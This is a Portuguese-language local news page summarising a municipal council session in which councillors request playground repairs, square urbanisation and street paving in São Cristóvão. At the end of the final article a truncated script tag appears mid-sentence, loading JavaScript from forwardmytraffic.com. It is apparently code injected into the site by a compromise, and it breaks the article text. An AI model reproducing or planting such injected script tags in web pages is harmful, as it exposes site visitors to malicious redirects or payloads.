InícioDestaqueResumão da Sessão da Câmara

Resumão da Sessão da Câmara

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

 

Vereador solicita melhorias no parquinho de escola no São Cristóvão

 

O vereador Edenilson Enguel (PSD), utilizou-se da Palavra Livre da sessão da última quarta-feira, 17, para fazer solicitações verbais ao executivo. Ele destacou a falta de manutenção preventiva para o período de chuvas e alertou sobre a situação precária de um parquinho em uma escola do Distrito de São Cristóvão.

 

 

De acordo com a fala do vereador o Parquinho da Escola João Pacheco de Miranda Lima, Extensão 02, está “enterrado no meio da lama”, após alertar os colegas que a situação ficou muito crítica devido às chuvas que atingiram a região nas últimas semanas.

 

 

Apontando para a situação precária, disse ainda que o problema só será resolvido após forte investimento “a situação ali é de caos e não é só pelo parquinho, será necessário um investimento em drenagem”, discorreu.

 

 

Ao concordar com a demanda do colega, João Francisco Canani (PSB), afirmou que a questão de segurança e manutenção dos parquinhos nas escolas municipais é primordial: “precisamos cuidar dos pequeninos, essa questão de infra-estrutura nos parquinhos tem que virar lei”, finalizou.

 

 

Edenilson Enguel ainda comentou sobre a situação das ruas no distrito do São Cristóvão que ficaram danificadas ao período chuvoso.

 

 

Ernani Jr pede urbanização de praça entre o Bairro Argentina e João Paulo II

 

O vereador Ernani Wogeinaki Jr (PSB), solicitou que a prefeitura proceda com estudos para determinar a urbanização da Praça Cassemiro Gauloski, bem como suas imediações. Ele alegou que o local carece de infra-estrutura e que as melhorias deixarão a cidade mais bonita. O pedido foi feito via indicação na sessão da última quarta-feira, 17.

 

 

De acordo com o texto é necessário determinar à Secretaria de Urbanismo para proceder com a revitalização da praça, bem como suas imediações. O vereador demanda que sejam construídas calçadas para pedestres desde o Portal da Cidade até a ponte do Rio Argentina.

 

 

Além disso, Ernani Jr cobrou a instalação de bancos, iluminação adequada, ajardinamento com árvores e flores e também que seja reformada a grade de proteção na passarela de pedestres sobre o Rio Argentina.

 

 

“Em dias de chuva os moradores que andam por ali tem de escolher se vão passar no barro ou no asfalto, precisa urgentemente das caçadas”, disse o vereador ao utilizar a palavra livre. “Não só isso, mas a praça fica na entrada da cidade, e precisamos deixá-la mais bonita”, justificou.

 

 

O vereador Laudecir José Gonçalves, Barriga (PR), apoiou a indicação do colega e afirmou que ainda é necessário lembrar da SC 120, que “precisa de urbanização até a curva”, lembrando que a demanda de caminhões oriundos do Desvio do Tigre tem também prejudicado a manutenção da via.

 

Cerival Da Cruz volta a cobrar pavimentações no São Cristóvão

 

O vereador e presidente da casa, Cerival Da Cruz, Cidinho (DEM), voltou a cobrar pavimentação com asfalto em determinadas ruas do Distrito do São Cristóvão. A demanda foi apresentada via indicação na sessão da última quarta-feira, 17. A propositura foi enviada ao executivo para providências.

 

 

No texto o vereador pediu o asfaltamento das ruas: Adolfo Thien; e Deoclésio de Oliveira Martins.

 

 

Cidinho defendeu que o objetivo é oferecer melhores condições de tráfego para veículos, pedestres e ciclistas. Além disso, destacou que as melhorias irão dar melhor aspecto urbanístico para o Distrito e uma maior valorização das propriedades.

 

 

Da Cruz ainda destacou que as ruas são vias importantes dentro do Distrito de São Cristóvão e que a obra ainda contemple a adequação de saneamento e esgoto…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.